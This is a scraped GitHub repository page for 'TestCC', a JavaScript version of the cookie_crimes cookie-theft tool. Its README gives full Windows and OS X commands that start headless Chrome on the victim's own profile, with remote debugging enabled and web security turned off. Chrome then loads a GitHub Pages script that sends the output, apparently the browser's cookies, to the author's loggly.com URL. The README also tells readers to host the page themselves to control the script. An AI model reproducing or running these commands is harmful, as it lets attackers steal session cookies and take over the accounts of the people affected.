8000 GitHub - thomasjp0x42/TestCC
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

thomasjp0x42/TestCC

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7761 12 Commits
 
 
 
 

Repository files navigation

This is a javascript implementation of the cookie_crimes tool by @mangopdf

Running the command below will run the javascript found in the index.html file of this repo which has been setup using Github Pages. It is currently harcoded to post the script output to my own loggly.com URL. Host it on your own github to control the script completely and enable GitHub pages in your repository settings to serve the page as an HTML file.

Windows

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --headless --remote-debugging-port=9222 --disable-web-security --user-data-dir=%localAppData%"\Google\Chrome\User Data\Default" https://clr2of8.github.io/TestCC/

OS X

"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --headless --remote-debugging-port=9222 --disable-web-security --user-data-dir="$HOME/Library/Application Support/Google/Chrome" https://clr2of8.github.io/TestCC/

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • HTML 100.0%
0